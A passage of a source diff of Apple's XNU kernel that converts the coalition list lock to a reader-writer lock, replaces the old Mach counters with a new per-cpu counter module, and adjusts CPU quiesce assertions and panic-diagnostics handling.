a/osfmk/kern/coalition.c +++ b/osfmk/kern/coalition.c @@ -89,7 +89,7 @@ int merge_adaptive_coalitions; LCK_GRP_DECLARE(coalitions_lck_grp, "coalition"); /* coalitions_list_lock protects coalition_count, coalitions queue, next_coalition_id. */ -static LCK_MTX_DECLARE(coalitions_list_lock, &coalitions_lck_grp); +static LCK_RW_DECLARE(coalitions_list_lock, &coalitions_lck_grp); static uint64_t coalition_count; static uint64_t coalition_next_id = 1; static queue_head_t coalitions_q; @@ -1198,7 +1198,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t lck_mtx_init(&new_coal->lock, &coalitions_lck_grp, LCK_ATTR_NULL); - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_exclusive(&coalitions_list_lock); new_coal->id = coalition_next_id++; coalition_count++; enqueue_tail(&coalitions_q, &new_coal->coalitions); @@ -1215,7 +1215,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t #endif cid = new_coal->id; ctype = new_coal->type; - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_exclusive(&coalitions_list_lock); coal_dbg("id:%llu, type:%s", cid, coal_type_str(ctype)); @@ -1281,22 +1281,29 @@ coalition_release(coalition_t coal) * coalition_find_by_id_internal * Returns: Coalition object with specified id, NOT referenced. * If not found, returns COALITION_NULL. - * Condition: coalitions_list_lock must be LOCKED. + * If found, returns a locked coalition. 
+ * + * Condition: No locks held */ static coalition_t coalition_find_by_id_internal(uint64_t coal_id) { + coalition_t coal; + if (coal_id == 0) { return COALITION_NULL; } - lck_mtx_assert(&coalitions_list_lock, LCK_MTX_ASSERT_OWNED); - coalition_t coal; + lck_rw_lock_shared(&coalitions_list_lock); qe_foreach_element(coal, &coalitions_q, coalitions) { if (coal->id == coal_id) { + coalition_lock(coal); + lck_rw_unlock_shared(&coalitions_list_lock); return coal; } } + lck_rw_unlock_shared(&coalitions_list_lock); + return COALITION_NULL; } @@ -1308,23 +1315,16 @@ coalition_find_by_id_internal(uint64_t coal_id) coalition_t coalition_find_by_id(uint64_t cid) { - if (cid == 0) { - return COALITION_NULL; - } - - lck_mtx_lock(&coalitions_list_lock); - coalition_t coal = coalition_find_by_id_internal(cid); + if (coal == COALITION_NULL) { - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } - coalition_lock(coal); + /* coal is locked */ if (coal->reaped) { coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } @@ -1338,7 +1338,6 @@ coalition_find_by_id(uint64_t cid) #endif coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); coal_dbg("id:%llu type:%s ref_count:%u", coal->id, coal_type_str(coal->type), rc); @@ -1357,25 +1356,18 @@ coalition_find_by_id(uint64_t cid) coalition_t coalition_find_and_activate_by_id(uint64_t cid) { - if (cid == 0) { - return COALITION_NULL; - } - - lck_mtx_lock(&coalitions_list_lock); - coalition_t coal = coalition_find_by_id_internal(cid); + if (coal == COALITION_NULL) { - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } - coalition_lock(coal); + /* coal is locked */ if (coal->reaped || coal->terminated) { /* Too late to put something new into this coalition, it's * already on its way out the door */ coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } @@ -1393,7 +1385,6 @@ coalition_find_and_activate_by_id(uint64_t cid) #endif 
coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); coal_dbg("id:%llu type:%s ref_count:%u, active_count:%u", coal->id, coal_type_str(coal->type), rc, ac); @@ -2003,10 +1994,10 @@ coalition_reap_internal(coalition_t coal) coalition_unlock(coal); - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_exclusive(&coalitions_list_lock); coalition_count--; remqueue(&coal->coalitions); - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_exclusive(&coalitions_list_lock); /* Release the list's reference and launchd's reference. */ coalition_release(coal); @@ -2116,7 +2107,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz) int ncoals = 0; struct coalition *coal; - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_shared(&coalitions_list_lock); qe_foreach_element(coal, &coalitions_q, coalitions) { if (!coal->reaped && (type < 0 || type == (int)coal->type)) { if (coal_list && ncoals < list_sz) { @@ -2125,7 +2116,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz) ++ncoals; } } - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_shared(&coalitions_list_lock); return ncoals; } diff --git a/osfmk/kern/counter.h b/osfmk/kern/counter.h new file mode 100644 index 000000000..f7a43fa48 --- /dev/null +++ b/osfmk/kern/counter.h @@ -0,0 +1,231 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. 
The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ +#ifdef XNU_KERNEL_PRIVATE + +#ifndef _KERN_COUNTER_H +#define _KERN_COUNTER_H + +/*! + * @file + * + * @brief + * Module for working with 64bit relaxed atomic counters. + * + * @discussion + * Different counter types have different speed-memory tradeoffs, but + * they all share a common interface. + * + * Counters can be statically allocated or dynamically allocated. + * + * Statically allocated counters are always backed by per-cpu storage which means + * writes take place on the current CPUs value and reads sum all of the per-cpu values. + * + * Dynamically allocated counters can be either per-cpu or use a single 64bit value. + * To create a per-cpu counter, use the scalable_counter_t type. Note that this + * trades of additional memory for better scalability. + * To create a single 64bit counter, use the atomic_counter_t type. + * + * For most counters you can just use the counter_t type and the choice of + * scalable or atomic will be made at compile time based on the target. 
+ * + * The counter types are opaque handles. They ARE NOT COPYABLE. If you need + * to make a copy of a counter, you should do so like this: + * + * counter_t original; + * ... + * counter_t copy; + * counter_alloc(&copy); + * counter_add(&copy, counter_load(&original)); + * ... + * // Make sure to free them at some point. + * counter_free(&original); + * counter_free(&copy); + * + * + * Static counter example: + * + * SCALABLE_COUNTER_DEFINE(my_counter); + * ... + * counter_inc(&my_counter); + * assert(counter_load(&my_counter) == 1); + * + * + * Dynamic Counter Example: + * + * scalable_counter_t my_percpu_counter; + * atomic_counter_t my_atomic_counter; + * counter_t my_counter; + * + * // All three counters share the same interface. So to change the speed-memory + * // tradeoff just change the type. + * counter_init(&my_scalable_counter); + * counter_init(&my_atomic_counter); + * counter_init(&my_counter); + * + * counter_inc(&my_scalable_counter); + * counter_inc(&my_atomic_counter); + * counter_inc(&my_counter); + * + * assert(counter_load(&my_scalable_counter) == 1); + * assert(counter_load(&my_atomic_counter) == 1); + * assert(counter_load(&my_counter) == 1); + * + */ + +#include +#include +#include +#include + +typedef __zpercpu uint64_t *scalable_counter_t; +typedef uint64_t atomic_counter_t; +/* Generic counter base type. Does not have an implementation. */ +struct generic_counter_t; + +/*! + * @macro SCALABLE_COUNTER_DECLARE + * + * @abstract + * (optionally) declares a static per-cpu counter (in a header). + * + * @param var the name of the counter. + */ +#define SCALABLE_COUNTER_DECLARE(name) \ + extern scalable_counter_t name; + +/*! + * @macro SCALABLE_COUNTER_DEFINE + * + * @abstract + * Defines a static per-cpu counter. + * Counter can only be accessed after the TUNABLES phase of startup. + * + * @param var the name of the counter. 
+ */ +#define SCALABLE_COUNTER_DEFINE(name) \ + __startup_data uint64_t __ ##name##_early_storage = 0; \ + scalable_counter_t name = {&__##name##_early_storage}; \ + STARTUP_ARG(TUNABLES, STARTUP_RANK_MIDDLE, scalable_counter_static_boot_mangle, &name); \ + STARTUP_ARG(PERCPU, STARTUP_RANK_SECOND, scalable_counter_static_init, &name); + +/* + * Initialize a per-cpu counter. + * May block and will never fail. + * This counter must be freed with counter_free. + */ +OS_OVERLOADABLE +extern void counter_alloc(struct generic_counter_t *); + +OS_OVERLOADABLE +extern void counter_free(struct generic_counter_t *); +/* + * Add amount to counter. + * @param amount: The amount to add. + */ +OS_OVERLOADABLE +extern void counter_add(struct generic_counter_t *, uint64_t amount); + +/* + * Add 1 to this counter. + */ +OS_OVERLOADABLE +extern void counter_inc(struct generic_counter_t *); + +/* + * Subtract 1 from this counter. + */ +OS_OVERLOADABLE +extern void counter_dec(struct generic_counter_t *); + +/* Variants of the above operations where the caller takes responsibility for disabling preemption. */ +OS_OVERLOADABLE +extern void counter_add_preemption_disabled(struct generic_counter_t *, uint64_t amount); +OS_OVERLOADABLE +extern void counter_inc_preemption_disabled(struct generic_counter_t *); +OS_OVERLOADABLE +extern void counter_dec_preemption_disabled(struct generic_counter_t *); + +/* + * Read the value of the percpu counter. + * Note that this will cause synchronization of all the sharded values. + */ +OS_OVERLOADABLE +extern uint64_t counter_load(struct generic_counter_t *); + +#pragma mark implementation details +/* NB: Nothing below here should be used directly. 
*/ + +__startup_func void scalable_counter_static_boot_mangle(scalable_counter_t *counter); +__startup_func void scalable_counter_static_init(scalable_counter_t *counter); + +#if XNU_TARGET_OS_WATCH || XNU_TARGET_OS_TV +#define ATOMIC_COUNTER_USE_PERCPU 0 +#else +#define ATOMIC_COUNTER_USE_PERCPU 1 +#endif /* XNU_TARGET_OS_OSX */ + +#if ATOMIC_COUNTER_USE_PERCPU +typedef scalable_counter_t counter_t; +#else +typedef atomic_counter_t counter_t; +#endif /* ATOMIC_COUNTER_USE_PERCPU */ + +#define COUNTER_MAKE_PROTOTYPES(counter_t) \ +OS_OVERLOADABLE \ +extern void counter_alloc(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_free(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_add(counter_t *, uint64_t amount); \ + \ +OS_OVERLOADABLE \ +extern void counter_inc(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_dec(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_add_preemption_disabled(counter_t *, uint64_t amount); \ + \ +OS_OVERLOADABLE \ +extern void counter_inc_preemption_disabled(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_dec_preemption_disabled(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern uint64_t counter_load(counter_t *); + +COUNTER_MAKE_PROTOTYPES(scalable_counter_t); +COUNTER_MAKE_PROTOTYPES(atomic_counter_t); + +#endif /* _KERN_COUNTER_H */ + +#endif /* XNU_KERNEL_PRIVATE */ diff --git a/osfmk/kern/counter_common.c b/osfmk/kern/counter_common.c new file mode 100644 index 000000000..9b1213273 --- /dev/null +++ b/osfmk/kern/counter_common.c @@ -0,0 +1,165 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. 
The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +SECURITY_READ_ONLY_LATE(zone_t) counters_zone; +ZONE_INIT(&counters_zone, "per_cpu_counters", sizeof(uint64_t), + ZC_PERCPU | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, NULL); + +/* + * Tracks how many static scalable counters are in use since they won't show up + * in the per_cpu_counters zone stats. + */ +uint64_t num_static_scalable_counters; + +/* + * Mangle the given scalable_counter_t so that it points to the early storage + * regardless of which CPU # we're boot on. + * Must be run before we go multi-core. + */ +__startup_func void +scalable_counter_static_boot_mangle(scalable_counter_t *counter) +{ + *counter = __zpcpu_mangle_for_boot(*counter); +} + +/* + * Initializes a static counter in permanent per-cpu memory. + * Run during startup for each static per-cpu counter + * Must be run before we go multi-core. 
+ */ +__startup_func void +scalable_counter_static_init(scalable_counter_t *counter) +{ + /* + * We pointed the counter to a single global value during early boot. + * Grab that value now. We'll store it in our current CPU's value + */ + uint64_t current_value = os_atomic_load_wide(zpercpu_get(*counter), relaxed); + /* + * This counter can't be freed so we allocate it out of the permanent zone rather than + * our counter zone. + */ + *counter = zalloc_percpu_permanent(sizeof(uint64_t), ZALIGN_64); + os_atomic_store_wide(zpercpu_get(*counter), current_value, relaxed); + num_static_scalable_counters++; +} + +OS_OVERLOADABLE +void +counter_alloc(scalable_counter_t *counter) +{ + *counter = zalloc_percpu(counters_zone, Z_WAITOK | Z_ZERO | Z_NOFAIL); +} + +OS_OVERLOADABLE +void +counter_alloc(atomic_counter_t *counter) +{ + os_atomic_store_wide(counter, 0, relaxed); +} + +OS_OVERLOADABLE +void +counter_free(scalable_counter_t *counter) +{ + zfree_percpu(counters_zone, *counter); +} + +OS_OVERLOADABLE +void +counter_free(atomic_counter_t *counter) +{ + (void)counter; +} + +OS_OVERLOADABLE +void +counter_add(atomic_counter_t *counter, uint64_t amount) +{ + os_atomic_add(counter, amount, relaxed); +} + +OS_OVERLOADABLE +void +counter_inc(atomic_counter_t *counter) +{ + os_atomic_inc(counter, relaxed); +} + +OS_OVERLOADABLE +void +counter_dec(atomic_counter_t *counter) +{ + os_atomic_dec(counter, relaxed); +} + +OS_OVERLOADABLE +void +counter_add_preemption_disabled(atomic_counter_t *counter, uint64_t amount) +{ + counter_add(counter, amount); +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(atomic_counter_t *counter) +{ + counter_inc(counter); +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(atomic_counter_t *counter) +{ + counter_dec(counter); +} + +OS_OVERLOADABLE +uint64_t +counter_load(atomic_counter_t *counter) +{ + return os_atomic_load_wide(counter, relaxed); +} + +OS_OVERLOADABLE +uint64_t +counter_load(scalable_counter_t *counter) +{ + 
uint64_t value = 0; + zpercpu_foreach(it, *counter) { + value += os_atomic_load_wide(it, relaxed); + } + return value; +} diff --git a/osfmk/kern/counters.c b/osfmk/kern/counters.c deleted file mode 100644 index 2e56e413c..000000000 --- a/osfmk/kern/counters.c +++ /dev/null @@ -1,108 +0,0 @@ -/* - * Copyright (c) 2000-2007 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * Mach Operating System - * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University - * All Rights Reserved. 
- * - * Permission to use, copy, modify and distribute this software and its - * documentation is hereby granted, provided that both the copyright - * notice and this permission notice appear in all copies of the - * software, derivative works or modified versions, and any portions - * thereof, and that both notices appear in supporting documentation. - * - * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" - * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR - * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. - * - * Carnegie Mellon requests users of this software to return to - * - * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU - * School of Computer Science - * Carnegie Mellon University - * Pittsburgh PA 15213-3890 - * - * any improvements or extensions that they make and grant Carnegie Mellon - * the rights to redistribute these changes. - */ -/* - */ - -#include - -#include - -/* - * We explicitly initialize the counters to make - * them contiguous in the kernel's data space. - * This makes them easier to examine with ddb. 
- */ - -#if MACH_COUNTERS -mach_counter_t c_action_thread_block = 0; -mach_counter_t c_ast_taken_block = 0; -mach_counter_t c_dev_io_blocks = 0; -mach_counter_t c_dev_io_tries = 0; -mach_counter_t c_idle_thread_block = 0; -mach_counter_t c_idle_thread_handoff = 0; -mach_counter_t c_incoming_interrupts = 0; -mach_counter_t c_io_done_thread_block = 0; -mach_counter_t c_ipc_mqueue_receive_block_kernel = 0; -mach_counter_t c_ipc_mqueue_receive_block_user = 0; -mach_counter_t c_ipc_mqueue_send_block = 0; -mach_counter_t c_net_thread_block = 0; -mach_counter_t c_reaper_thread_block = 0; -mach_counter_t c_sched_thread_block = 0; -mach_counter_t c_stacks_current = 0; -mach_counter_t c_stacks_max = 0; -mach_counter_t c_stacks_min = 0; -mach_counter_t c_swtch_block = 0; -mach_counter_t c_swtch_pri_block = 0; -mach_counter_t c_syscalls_unix = 0; -mach_counter_t c_syscalls_mach = 0; -mach_counter_t c_thread_invoke_csw = 0; -mach_counter_t c_thread_invoke_hits = 0; -mach_counter_t c_thread_invoke_misses = 0; -mach_counter_t c_thread_invoke_same = 0; -mach_counter_t c_thread_invoke_same_cont = 0; -mach_counter_t c_thread_switch_block = 0; -mach_counter_t c_thread_switch_handoff = 0; -mach_counter_t c_vm_fault_page_block_backoff_kernel = 0; -mach_counter_t c_vm_fault_page_block_busy_kernel = 0; -mach_counter_t c_vm_map_simplified = 0; -mach_counter_t c_vm_map_simplify_called = 0; -mach_counter_t c_vm_map_simplify_entry_called = 0; -mach_counter_t c_vm_page_wait_block = 0; -mach_counter_t c_vm_pageout_block = 0; -mach_counter_t c_vm_pageout_scan_block = 0; -mach_counter_t c_vm_fault_retry_on_w_prot = 0; -mach_counter_t c_vm_fault_wait_on_unlock = 0; -#endif /* MACH_COUNTERS */ diff --git a/osfmk/kern/counters.h b/osfmk/kern/counters.h deleted file mode 100644 index e0f9aaea6..000000000 --- a/osfmk/kern/counters.h +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Copyright (c) 2000-2007 Apple Inc. All rights reserved. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * Mach Operating System - * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University - * All Rights Reserved. - * - * Permission to use, copy, modify and distribute this software and its - * documentation is hereby granted, provided that both the copyright - * notice and this permission notice appear in all copies of the - * software, derivative works or modified versions, and any portions - * thereof, and that both notices appear in supporting documentation. - * - * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" - * CONDITION. 
CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR - * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. - * - * Carnegie Mellon requests users of this software to return to - * - * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU - * School of Computer Science - * Carnegie Mellon University - * Pittsburgh PA 15213-3890 - * - * any improvements or extensions that they make and grant Carnegie Mellon - * the rights to redistribute these changes. - */ -/* - */ - -#ifndef _KERN_COUNTERS_ -#define _KERN_COUNTERS_ - -#include - -/* - * We can count various interesting events and paths. - * - * Use counter() to change the counters, eg: - * counter(c_idle_thread_block++); - * Use counter_always() for non-conditional counters. - */ - -#define counter_always(code) code - -#if MACH_COUNTERS - -#define counter(code) counter_always(code) - -#else /* MACH_COUNTERS */ - -#define counter(code) - -#endif /* MACH_COUNTERS */ - -/* - * We define the counters with individual integers, - * instead of a big structure, so that ddb - * will know the addresses of the counters. 
- */ - -typedef unsigned int mach_counter_t; - -#if MACH_COUNTERS -extern mach_counter_t c_action_thread_block; -extern mach_counter_t c_ast_taken_block; -extern mach_counter_t c_dev_io_blocks; -extern mach_counter_t c_dev_io_tries; -extern mach_counter_t c_idle_thread_block; -extern mach_counter_t c_idle_thread_handoff; -extern mach_counter_t c_incoming_interrupts; -extern mach_counter_t c_io_done_thread_block; -extern mach_counter_t c_ipc_mqueue_receive_block_kernel; -extern mach_counter_t c_ipc_mqueue_receive_block_user; -extern mach_counter_t c_ipc_mqueue_send_block; -extern mach_counter_t c_net_thread_block; -extern mach_counter_t c_reaper_thread_block; -extern mach_counter_t c_sched_thread_block; -extern mach_counter_t c_stacks_current; -extern mach_counter_t c_stacks_max; -extern mach_counter_t c_stacks_min; -extern mach_counter_t c_swtch_block; -extern mach_counter_t c_swtch_pri_block; -extern mach_counter_t c_syscalls_unix; -extern mach_counter_t c_syscalls_mach; -extern mach_counter_t c_thread_invoke_csw; -extern mach_counter_t c_thread_invoke_same; -extern mach_counter_t c_thread_invoke_same_cont; -extern mach_counter_t c_thread_invoke_misses; -extern mach_counter_t c_thread_invoke_hits; -extern mach_counter_t c_thread_switch_block; -extern mach_counter_t c_thread_switch_handoff; -extern mach_counter_t c_vm_fault_page_block_backoff_kernel; -extern mach_counter_t c_vm_fault_page_block_busy_kernel; -extern mach_counter_t c_vm_fault_retry_on_w_prot; -extern mach_counter_t c_vm_fault_wait_on_unlock; -extern mach_counter_t c_vm_map_simplified; -extern mach_counter_t c_vm_map_simplify_called; -extern mach_counter_t c_vm_map_simplify_entry_called; -extern mach_counter_t c_vm_page_wait_block; -extern mach_counter_t c_vm_pageout_block; -extern mach_counter_t c_vm_pageout_scan_block; -#endif /* MACH_COUNTERS */ - -#endif /* _KERN_COUNTERS_ */ diff --git a/osfmk/kern/cpu_quiesce.c b/osfmk/kern/cpu_quiesce.c index 2ca5f67f0..7c613b5c6 100644 --- 
a/osfmk/kern/cpu_quiesce.c +++ b/osfmk/kern/cpu_quiesce.c @@ -90,16 +90,17 @@ static uint64_t cpu_checkin_min_interval; static uint32_t cpu_checkin_min_interval_us; #if __LP64__ -static_assert(MAX_CPUS <= 32); -#define CPU_CHECKIN_MASK 0x5555555555555555UL -#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) +#define CPU_CHECKIN_MASK_MAX_CPUS 32 +#define CPU_CHECKIN_MASK 0x5555555555555555UL +#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) #else /* Avoid double-wide CAS on 32-bit platforms by using a 32-bit state and mask */ -static_assert(MAX_CPUS <= 16); -#define CPU_CHECKIN_MASK 0x55555555UL -#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) +#define CPU_CHECKIN_MASK_MAX_CPUS 16 +#define CPU_CHECKIN_MASK 0x55555555UL +#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) #endif +static_assert(MAX_CPUS <= CPU_CHECKIN_MASK_MAX_CPUS); static_assert(CPU_CHECKIN_MASK == CPU_EXPECTED_MASK >> 1); static inline checkin_mask_t @@ -117,10 +118,10 @@ cpu_expected_bit(int cpuid) void cpu_quiescent_counter_init(void) { - assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS)); - assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS)); - assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS)) == 0); - assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS)) == 0); + assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS - 1)); + assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS - 1)); + assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS - 1)) == 0); + assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS - 1)) == 0); cpu_quiescent_counter_set_min_interval_us(CPU_CHECKIN_MIN_INTERVAL_US); } @@ -192,6 +193,7 @@ cpu_quiescent_counter_join(__unused uint64_t ctime) struct cpu_quiesce *st = PERCPU_GET(cpu_quiesce); __assert_only int cpuid = cpu_number(); + assert(cpuid < MAX_CPUS); assert(st->state == CPU_QUIESCE_COUNTER_NONE || st->state == CPU_QUIESCE_COUNTER_LEFT); diff --git a/osfmk/kern/debug.c b/osfmk/kern/debug.c index 0cb5ea810..fcb23e1f7 100644 --- a/osfmk/kern/debug.c +++ 
b/osfmk/kern/debug.c @@ -1058,7 +1058,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned * conventional sense. */ if (debugger_current_op == DBOP_PANIC || ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) -#endif +#endif /* __x86_64__ */ { kdp_callouts(KDP_EVENT_PANICLOG); @@ -1075,6 +1075,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned /* DEBUGGER_OPTION_PANICLOGANDREBOOT is used for two finger resets on embedded so we get a paniclog */ if (debugger_panic_options & DEBUGGER_OPTION_PANICLOGANDREBOOT) { + PEHaltRestart(kPEPanicDiagnosticsDone); PEHaltRestart(kPEPanicRestartCPUNoCallouts); } } @@ -1087,6 +1088,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned */ if ((debugger_panic_options & DEBUGGER_OPTION_SKIP_LOCAL_COREDUMP) && (debug_boot_arg & DB_REBOOT_POST_CORE)) { + PEHaltRestart(kPEPanicDiagnosticsDone); kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } @@ -1097,7 +1099,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned if (on_device_corefile_enabled()) { if (!kdp_has_polled_corefile()) { if (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI)) { - paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)", + paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)\n", kdp_polled_corefile_error()); #if defined(__arm__) || defined(__arm64__) panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED; @@ -1112,7 +1114,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned } #if XNU_MONITOR else if ((pmap_get_cpu_data()->ppl_state == PPL_STATE_PANIC) && (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI))) { - paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC 
state"); + paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state\n"); panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED; paniclog_flush(); } @@ -1145,11 +1147,17 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned */ if ((debug_boot_arg & DB_REBOOT_POST_CORE) && ((ret == 0) || (debugger_panic_options & DEBUGGER_OPTION_ATTEMPTCOREDUMPANDREBOOT))) { + PEHaltRestart(kPEPanicDiagnosticsDone); kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } } } + if (debugger_current_op == DBOP_PANIC || + ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) { + PEHaltRestart(kPEPanicDiagnosticsDone); + } + if (debug_boot_arg & DB_REBOOT_ALWAYS) { kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } @@ -1179,6 +1187,11 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned panic_spin_shmcon(); } #endif /* defined(__arm__) 